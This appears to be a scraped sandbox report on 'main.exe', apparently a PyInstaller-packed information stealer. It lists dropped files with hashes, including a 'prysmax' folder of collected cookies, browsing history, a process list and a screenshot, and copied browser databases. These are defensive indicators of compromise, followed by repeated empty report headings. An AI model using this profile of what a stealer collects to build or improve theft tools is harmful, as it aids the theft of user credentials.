C:\Users\user\AppData\Local\Temp\_MEI75802\libssl-3.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	19A2ABA25456181D5FB572D88AC0E73E	656CA8CDFC9C3A6379536E2027E93408851483DB	2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	A33FFBBC2D260A7C2370E69AB5BA4064	B9D8D5C706A5A516A6F60877792C60795BCD3C90	FB9A9F06BD313298934651FD84583FEC6A3D3C78BBCF982E33399B6E6648DD7C
C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	B7A9AD530A12FED36FD741152AE5681B	B7E231D6B54B56C25AEE9FE2D2FD6CE02202FCB0	AA2C96DD541A3A97789C3BD5F26C0E236B2DF84658995BF4315F69CC0508A76B
C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.pdb	MSVC program database ver 7.00, 4096*579 bytes	DB3980C377DC1940CA2507933B7E9ACB	61DE86992BD29D65011C9F4E94A695A204D995CB	41BCB2B3DEA321B5DCFA107E8DB8842686B61ADE534F802E00ACDF365EC2B2D7
C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	7A9632D241AD8B97BB50E8EF6DAC1CA6	29F0D5DE91A84FA58CF45FD134358254B7DA12ED	DD0CCDEECA681645025CA0F562EA45B5B17A1EBFCF1688CD0647A950A2992E2F
C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	79561BC9F70383F8AE073802A321ADFB	5F378F47888E5092598C20C56827419D9F480FA7	C7C7564F7F874FB660A46384980A2CF28BC3E245CA83628A197CCF861EAB5560
C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	7E07C63636A01DF77CD31CFCA9A5C745	593765BC1729FDCA66DD45BBB6EA9FCD882F42A6	DB84BC052CFB121FE4DB36242BA5F1D2C031B600EF5D8D752CF25B7C02B6BAC6
C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	387BB2C1E40BDE1517F06B46313766BE	601F83EF61C7699652DEC17EDD5A45D6C20786C4	0817A2A657A24C0D5FBB60DF56960F42FC66B3039D522EC952DAB83E2D869364
C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	31C1BF2ACA5DF417F6CE2618C3EEFE7E	4C2F7FE265FF28396D03BA0CAB022BBD1785DBF2	1DAF7C87B48554F1481BA4431102D0429704832E42E3563501B1FFDD3362FCD1
C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	5D67ABF69A8939D13BEFB7DE9889B253	BCBBF88C05732D4E1E3811FD312425C1C92018D1	615EB8A75F9ED9371A59DA8F31E27EE091C013DB0B9164A5124CA0656EA47CB4
C:\Users\user\AppData\Local\Temp\_MEI75802\select.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	E4AB524F78A4CF31099B43B35D2FAEC3	A9702669EF49B3A043CA5550383826D075167291	BAE0974390945520EB99AB32486C6A964691F8F4A028AC408D98FA8FB0DB7D90
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\INSTALLER	ASCII text	365C9BFEB7D89244F2CE01C1DE44CB85	D7A03141D5D6B1E88B6B59EF08B6681DF212C599	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\LICENSE	ASCII text	7A7126E068206290F3FE9F8D6C713EA6	8E6689D37F82D5617B7F7F7232C94024D41066D1	DB3F0246B1F9278F15845B99FEC478B8B506EB76487993722F8C6E254285FAF8
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\METADATA	ASCII text	9E59BD13BB75B38EB7962BF64AC30D6F	70F6A68B42695D1BFA55ACB63D8D3351352B2AAC	80C7A3B78EA0DFF1F57855EE795E7D33842A0827AA1EF4EE17EC97172A80C892
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\RECORD	CSV text	087F72A04BB085627494651E36C4C513	1E39070E246F91D8926268A033C6F584E629E2DE	BFB77A968E06417BD37023BF1A2D7F1AAE9D8E74231665D6699D5BB82BDBD7B0
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\WHEEL	ASCII text	4D57030133E279CEB6A8236264823DFD	0FDC3988857C560E55D6C36DCC56EE21A51C196D	1B5E87E00DC87A84269CEAD8578B9E6462928E18A95F1F3373C9EEF451A5BCC0
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\entry_points.txt	ASCII text	D3262B65DB35BFFAAC248075345A266C	93AD6FE5A696252B9DEF334D182432CDA2237D1D	DEC880BB89189B5C9B1491C9EE8A2AA57E53016EF41A2B69F5D71D1C2FBB0453
C:\Users\user\AppData\Local\Temp\_MEI75802\setuptools-65.5.0.dist-info\top_level.txt	ASCII text	789A691C859DEA4BB010D18728BAD148	AEF2CBCCC6A9A8F43E4E150E7FCF1D7B03F0E249	77DC8BDFDBFF5BBAA62830D21FAB13E1B1348FF2ECD4CDCFD7AD4E1A076C9B88
C:\Users\user\AppData\Local\Temp\_MEI75802\sqlite3.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	89C2845BD090082406649F337C0CCA62	956736454F9C9E1E3D629C87D2C330F0A4443AE9	314BBA62F4A1628B986AFC94C09DC29CDAF08210EAE469440FBF46BCDB86D3FD
C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	FD9132F966EE6D214E0076BF0492FB30	89B95957F002BF382435D015E26962A42032CB97	37C68617FA02A2CADCED17EF724E2D450EF12A8A37215DA789A4679FDE1C5C02
C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	B58CA169FDCFFAB726391D3906DD9A4E	C4BB8DA84A5D9C31D0ACB7A4127F55E696F414DF	1A8DCDBD730166889C03FAF285DC1DD9F16090DFE81043D80A9D6308300EBAC9
C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	D02300D803850C3B0681E16130FECEE4	6411815E2A908432A640719ECFE003B43BBBA35C	B938C8CD68B15EC62F053045A764D8DD38162A75373B305B4CF1392AC05DF5F9
C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	965E9833F4CD7A45C2C1EE85EFC2DA3B	3C6888194AD30E17DC5EEA7418133A541BCDDF07	5ECD0274DC220312824BB3086B3E129E38A9DCB06913A2F6173A94DC256BF4C5
C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	43AA404015B0CEE369E941DC30B3F4B0	A34CBA0D08A17934D84B16FCFF5282367EAA08AA	3FB83E9A14901321324F17D11DA50802B6777733E1EE0FD4F89DB0FD09C61690
C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	A19B5E6324D1A6A9FD99C98FE7B83FE2	4E3E56754A3C46C661EF591A4B5A5985BD4F6B85	3ED00BB5876EAFA617BEBB213D2BC887B5637C53C4A849FCC2366084BF056787
C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pyd	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	56DB4A861AEC914A860461DEDCDCA0A0	8535A8C9EAC371A54308795A8BBE89414933E035	6AB611C4A24406D9D97F09D49D50142AB2734B69A2B0D9EA6489E4AF90C4A2A4
C:\Users\user\AppData\Local\Temp\gen_py\3.11\__init__.py	ASCII text, with CRLF line terminators	8C7CA775CF482C6027B4A2D3DB0F6A31	E3596A87DD6E81BA7CF43B0E8E80DA5BC823EA1A	52C72CF96B12AE74D84F6C049775DA045FAE47C007DC834CA4DAC607B6F518EA
C:\Users\user\AppData\Local\Temp\gen_py\3.11\dicts.dat	data	2C7344F3031A5107275CE84AED227411	68ACAD72A154CBE8B2D597655FF84FD31D57C43B	83CDA9FECC9C008B22C0C8E58CBCBFA577A3EF8EE9B2F983ED4A8659596D5C11
C:\Users\user\AppData\Local\Temp\prysmax-745773.zip	Zip archive data, at least v2.0 to extract, compression method=store	0EB9EE8F67055D844D5DE8255E897C9D	AE8316659A1691B924ACA27D8C7AEDEAF8F91FC7	D89BCE9C80D3A81A1D51845AF5932334573E0F9B8F896F6984E3E68CF6883C0F
C:\Users\user\AppData\Local\Temp\prysmax-745773\information.txt	Unicode text, UTF-8 text, with CRLF line terminators	B498B558E2B2A151F994C1506FE32FB1	003B83EA325F3CB7B40971814A2AD59ED2137EAD	1CEE5A9083F8AE3813C002BFD6F8F49185DACC056AD604F6E5959127A46E609D
C:\Users\user\AppData\Local\Temp\prysmax-745773\prcookies.txt	ASCII text, with very long lines (515), with CRLF line terminators	8C6FF34551E5D45A9E60A03D31487053	23C65812BDDBE33010D34CA421BD4D187DF95F74	5D23122C1B86CC45E5EADDED5DED8AFE6751BFC2A9AD645CE59D08AEABED5BD4
C:\Users\user\AppData\Local\Temp\prysmax-745773\prhistory.txt	ASCII text, with CRLF line terminators	6A260B07BAB16CDD661E99BA9E0518F6	13AB556855EADC64A8FC060B09C192AE2EFA2C23	8014E4C7A0E9C2751F23C198AAFC5350334E087F4F56489BCEBD63EF540AB0CF
C:\Users\user\AppData\Local\Temp\prysmax-745773\process_list.txt	ASCII text, with CRLF line terminators	F5FAF197558C69C0CFEC5F930FAF44AE	277FF73BD187D72DA68851F30AE6CA02DC18A1AC	79EDD0B5D41C69CD89BD8A8B3029D73BB822092128F65BB15AA259A5B85A2F3F
C:\Users\user\AppData\Local\Temp\prysmax-745773\screenshot.png	PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced	DA53DEB000B4D8308DC246C61DC9B53F	A808A3CD3D138B384D7C3EBF4B6B814538503BC0	1A08580C81A7B15903E0CD0CC27E8E1D6E67601676BE36E464DAC6D6BD9DE4FE
C:\Users\user\AppData\Local\Tempcrdrjdmbol.db	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4	6A6BAD38068B0F6F2CADC6464C4FE8F0	4E3B235898D8E900548613DDB6EA59CDA5EB4E68	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
C:\Users\user\AppData\Local\Tempcrhpzreqps.db	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\Users\user\AppData\Local\Tempcrisnqbpuw.db	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\Users\user\AppData\Local\Tempcrjecpqddi.db	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Local\Tempcrkqoskfpt.db	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\Users\user\AppData\Local\Tempcrqgcuwzfl.db	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\Users\user\AppData\Local\Tempcrrtcvdzge.db	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\Users\user\AppData\Local\Tempcrtvqsliim.db	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
\Device\ConDrv	ASCII text, with CRLF line terminators	8D2E7126FD48AF00762BB44BADC4CC90	8A370983DCD5D7D22C364B8C3D5AF038F04DE0D9	07BA02BC0A103951D9B8898F73A7A7282E70D9D967FCF97F7F9BB3A8E9B86973

Windows Analysis Report
main.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report main.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
main.exe